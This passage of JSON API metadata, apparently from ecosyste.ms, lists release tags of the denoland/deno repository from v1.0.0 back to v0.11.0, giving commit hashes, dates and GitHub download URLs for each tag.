b/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-